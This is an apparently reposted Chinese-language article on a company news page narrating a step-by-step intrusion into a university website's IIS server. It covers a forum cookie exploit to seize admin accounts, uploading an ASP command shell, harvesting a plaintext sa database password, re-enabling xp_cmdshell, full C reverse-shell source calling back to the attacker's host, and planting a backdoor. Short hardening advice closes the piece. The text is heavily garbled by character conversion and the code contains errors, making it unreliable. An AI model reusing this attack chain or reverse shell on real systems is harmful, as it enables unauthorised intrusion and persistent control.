咨詢電(diàn)話(huà):023-88959644    24小(xiǎo)時(shí)服務熱線:400-023-8809
NEWS CENTER ·
新聞動态
關注中技(jì)互聯 關注前沿

內(nèi)網Web服務器(qì)的安全問題如何組建

發表日期:2014-09-30    文章編輯:    浏覽次數(shù):89    标簽:

 許多(duō)公司或公司将其Web效勞器(qì)放在內(nèi)網,并在防火(huǒ)牆上(shàng)做(zuò)映射,将來(lái)自80端口的懇求轉向一台內(nèi)網Web效勞器(qì)的Web端口。



  這樣做(zuò)安全性是提高(gāo)了不少(shǎo),但(dàn)并不代表将Web效勞器(qì)躲藏在內(nèi)網就必定安全了,由于Web效勞器(qì)自身仍是存在許多(duō)疑問的,特别是一些(xiē)CG,程序,通(tōng)常這是大(dà)家(jiā)最簡單忽略的當地。下面就以一台敞開(kāi)80端口的Web效勞器(qì)為(wèi)例,來(lái)測驗其存在的安全隐患疑問,并且對存在疑問做(zuò)測驗描繪,指出疑問的症結所在并給出防備錯施。



  這是某大(dà)學的文娛休閑網站(zhàn),進入看了看,頁面做(zuò)得(de)不錯,先看一看是什麽Web效勞器(qì)吧(ba)。



  D:\ne -vv www.target.com 80



  DNS fwd/rev mismatch:www.target.com!=traget



  www.target.com[192.168.0.1]80(http)open



  GEP/HTTP/1.0



  HOST:www.target.com



  HTTP/1.1 200 OK



  Server:Microsoft-IIS/5.0



  Content-location:http://www.target.com/index.asp



  Date:Thu,22 May 2003 12:13:32 GMT



  Content-Type:text/html



  ......



  是IIS5.0,看看能不能直接溢出。用最新的IIS的WebDav溢出試試。個(gè)人(rén)感覺isno寫的那(nà)個(gè)溢出對比好用,但(dàn)由于它是在內(nèi)網,這個(gè)東西緻使溢出後會(huì)直接在7788端口綁定一個(gè)cmd,這對咱們的這次侵略來(lái)說肯定是不可(kě)的。所以,我将它修改了一下,使它能夠反向銜接,但(dàn)終究仍是不可(kě),看來(lái)對方是打了補丁的。



  又逛了一下其他版面,看到有(yǒu)個(gè)BBS,是動網的論壇并且版别還(hái)對比低(dī)(5.00320)。不錯,這通(tōng)常是咱們的突破口(榜首大(dà)失利)。很(hěn)早曾經我和(hé)我的好友(yǒu)pskey曾發現一個(gè)它的cookie變量未過濾縫隙,他還(hái)寫了一個(gè)Exploit(程序放在光盤中)。經過這個(gè)縫隙,我能夠随意更改恣意用戶(包含總版主)的用戶暗碼。我用這個(gè)ID進入,進到後台辦理(lǐ),修改設置,答(dá)應上(shàng)載exe、asp等文件。再看看有(yǒu)沒有(yǒu)禁用FSO,成果沒有(yǒu)禁用(第二大(dà)失利)。我經過它上(shàng)載了一個(gè)aspcmdshell。這個(gè)aspcmdshell能夠使我以guests組權限的用戶在Web效勞器(qì)上(shàng)履行(xíng)指令,當然,前題是它沒有(yǒu)扔掉guests組對%systemroot%\winnt\cdm.exe的拜訪履行(xíng)權限。試試"dir c:\"看看,公然沒有(yǒu)制(zhì)止運轉(第三大(dà)失利)。其實,假如它制(zhì)止了cmd.exe的運轉權限也不要緊的,咱們能夠自已上(shàng)載一個(gè)上(shàng)去,再改一下這個(gè)aspcmdshell就能夠了。有(yǒu)了這個(gè)aspcmdshell,咱們能夠做(zuò)許多(duō)工作(zuò)。當然這還(hái)不夠,我的意圖是拿(ná)到最高(gāo)權限。此刻我就預備提高(gāo)權限了。先看一看辦理(lǐ)員給了guests組哪些(xiē)權限,看一下ipconfig的回來(lái)成果:



  Windows 2000 IP Configuration



  Ethernet adapter本地銜接:



  Connection-specific DNS Suffix.:



  IP Address.................: 192.168.1.222



  Subnet Mask................: 255.255.255.0



  Default Gateway............: 192.168.1.1



  喲,在內(nèi)網,不錯,再試試C:\可(kě)不可(kě)寫,答(dá)案是不可(kě)寫(不錯)。再試試其他目錄,整個(gè)C.盤都不可(kě)寫,隻給了Web目錄的可(kě)寫權限。再看一看跑了哪些(xiē)效勞,用netstat -an指令來(lái)檢查一下。



  TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING喲!還(hái)跑了MSSQL的,不錯。這時(shí)分榜首個(gè)想做(zuò)的即是看看哪些(xiē)程序運用了MSSQL數(shù)據庫。再到主頁上(shàng)逛逛,看到有(yǒu)一個(gè)新聞體(tǐ)系,很(hěn)有(yǒu)能夠即是它。用剛才那(nà)個(gè)aspcmdshell去檢查一下這個(gè)news/目錄裏邊的ASP程序,看到許多(duō)文件榜首行(xíng)都有(yǒu),根本上(shàng)這個(gè)即是數(shù)據庫的銜接程序了。檢查一下:



  strconn="Driver={SQL erver};Ddescription=sqldemo;



  SERVER=127.0.0.1;UID=sa;&



  PWD=hello;DATABASE=news



  set conn=server.createobject("adodb.connection")



  conn.open strconn



  公然不出我所料(第四大(dà)失利,将MSSQL的用戶名和(hé)暗碼以明(míng)文方式存放在ASP文件裏),拿(ná)到了MSSQL數(shù)據庫的暗碼,并且仍是sa用戶的,權限對比大(dà)哦。本來(lái)想看看能不能查找一下新聞體(tǐ)系ASP程序的縫隙,運用一下sql injection的。看來(lái)如今徹底沒有(yǒu)必要了。自個(gè)寫一個(gè)能夠用MSSQL拓展xp一cmdshell來(lái)履行(xíng)體(tǐ)系指令的ASP程序,這裏有(yǒu)能夠辦理(lǐ)員删了這個(gè)拓展,或直接删掉了xplog70.dll這個(gè)文件。不管它,先試試再說。寫sql.asp內(nèi)容如下:



  自個(gè)先開(kāi)防火(huǒ)牆,記載icmp數(shù)據包,然後在IE裏履行(xíng):



  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1



  這個(gè)ASP是經過動網論壇自個(gè)的上(shàng)載程序上(shàng)載機程序設定把上(shàng)載文件都上(shàng)載到up1Oad土mageS/這個(gè)目錄裏邊,根據當時(shí)時(shí)間(jiān)将文件重命名,所以文件名為(wèi)439587438739·aSp這樣的全數(shù)字構成。



  防火(huǒ)牆沒反響,暈!看來(lái)是删了Xp--CmdSheI1這個(gè)拓展,或直接删掉了Xp1Og70·d11這個(gè)文件。假如沒有(yǒu)直接删掉Xp1Og70·d11,而僅僅删了這個(gè)拓展的話(huà),我來(lái)試一下恢複這個(gè)拓展。再寫個(gè)ASP:



  上(shàng)載上(shàng)去,再履行(xíng)http://www.target.com/bbs/uploadimages/23456489432.asp.



  然後再提交懇求:



  http://www.target.com/bbs/uploadimages/



  439587438739.asp?cmd=ping%192.168.0.1



  呵呵,咱們的防火(huǒ)牆有(yǒu)反響了。來(lái)自www.target.com的icmp數(shù)據包被記載。看來(lái)沒有(yǒu)疑問了,經過這個(gè)ASP咱們能夠履行(xíng)許多(duō)指令 (第五大(dà)失利),都是system權限,隻不過沒有(yǒu)回顯,不是很(hěn)完美。所以想得(de)到一個(gè)交互式的she1l。寫個(gè)反連的程序吧(ba):



  #include



  #include



  #pragma comment(lib."ws2_32")



  void main(int argc,char*argv[])



  {



  WSADATA wsaData;



  SOCKET hSocket;



  STARTUPINFO si;



  PROCESS_INFORMATION pi;



  struct sockaddr_in adik_sin;



  memset(&adik_sin,0,sizeof(adik_sin));



  memset(&si,0,sizeof(si));



  WSAStartuup(MAKEWORD(2,0),&WSAdATA);



  hSocket=WSASocket(AF_INET,



  SOCK_STREMA,NULL,NULL,NULL,NULL);



  adik_sin.sin_family=AF_INET;



  adik_sin.sin_port=htons(53);//銜接到我的主機53端口



  adik_sin.sin_addr.s_addr=inet_addr("192.



  168.0.1:);//我的主機的IP



  connect(hSocket.(struct sockaddr*)%adik_sin,



  sizeof(adik_sin);



  si.cb=sizeof(si)



  si.dwFlags-STARTF_USESTDHANDLES;



  si.hStdlnput=si.hStdOutput=si.hStdError



  =(void*)hSocket;



  CreateProcess(NULL."cmd.exe",NULL,



  NULL,1,NULL,NULL,NULL,&si.&pi);



  ExitProcess(0);



  }



  編譯成a.exe然後上(shàng)載上(shàng)去先在本機用nc監聽(tīng)一個(gè)端口53,然後在IE裏履行(xíng):



  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe



  D:\nc-1 -p 53



  Microsoft Windows 2000[Version 5.00.2195]



  版權所有(yǒu)1985-2000Microsoft Corp:



  D:\inetpub\wwwroot\bbs\uploadimages>ipconfig



  windows 2000 IP Configuration



  Ethernet adapter本地銜接:



  Connection-specific DNS Suffix.:



  IP Address..............:192.168.1.222



  Subnet Mask.............:255.255.255.0



  Default Gateway.........:192.168.1.1



  D:\inetpub\wwwroot\bbs\uploadimages>



  好了,到此為(wèi)止,侵略根本上(shàng)完成了,如今咱們現已拿(ná)到了一個(gè)system權限的交互式shell,咱們能夠"随心所欲"了。這個(gè)時(shí)分咱們能夠裝一個(gè)後門(mén),使得(de)咱們萄次進來(lái)不必這麽費事,我曾經寫了"一個(gè)US-BACKDOOR。使咱們能夠經過80端口來(lái)"得(de)到一個(gè)交互式的shell,且不影(yǐng)響,IIS程序自身的。正常運轉。這個(gè)backdoor能夠在我的主頁上(shàng)下載到。  上(shàng)面的幾大(dà)失利使得(de)咱們每避一步人(rén)侵都取得(de)了更多(duō)的權限,其實一個(gè)優異的辦理(lǐ)員徹底能夠防止這些(xiē)。所以,一個(gè)小(xiǎo)小(xiǎo)的ASP程序過錯都能夠使你(nǐ)的效勞器(qì)被Cracker損壞。程序員們,該留意一下你(nǐ)們的程序了。對于前面我說到的幾大(dà)失利,我稍稍總緒一下辦理(lǐ)"根本應當做(zuò)到的當地:



  (1)、不要運用已知縫隙非常多(duō)的ASP程序,特别是像動網對比低(dī)的版别這類,即便運用了,也要常常去官方論壇看看對比新的縫隙信息,及時(shí)打補丁或晉級程序。



  (2)、假如沒有(yǒu)必要用到FSO,能夠禁用。



  (3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests指令,制(zhì)止掉GUESTS組用戶拜訪cmd.exe。



  (4)、盡量不要将數(shù)據庫的暗碼以明(míng)文的方式放在ASP程序裏邊,能夠運用數(shù)據源的方式來(lái)銜接數(shù)據庫。



  (5)、通(tōng)常用戶應當用不到xp_crndshell這個(gè)拓展的,那(nà)麽最佳删掉xplog70.dll;盡量不要用sa這個(gè)用戶。将sa的暗碼設雜亂一些(xiē),能夠另建一個(gè)用戶,把權限調到最低(dī)。



  跋文



  文中所說到的被進犯的網站(zhàn)主并非一台露出在外面的裸機,而是經過防火(huǒ)牆映射的放置在內(nèi)網的效勞。

如沒特殊注明(míng),文章均為(wèi)中技(jì)互聯原創,轉載請(qǐng)注明(míng)來(lái)自www.zjcoo.com
相關新聞

CopyrightZJCOO technology Co., LTD. All Rights Reserved.    

渝ICP 備11003429号

  • qq客服
  • 公衆号
  • 手機版
  • 新浪微博